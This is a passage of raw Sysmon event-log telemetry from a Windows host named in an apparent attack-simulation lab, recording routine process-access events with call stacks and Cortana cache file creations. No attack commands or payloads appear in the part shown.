13:30:11.264{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+6375|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+b780|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+590b|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+188af3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+188af3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.248{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.232{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.232{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.232{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000011344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.185{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-14 13:30:11.185 11241100x800000000000000011336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 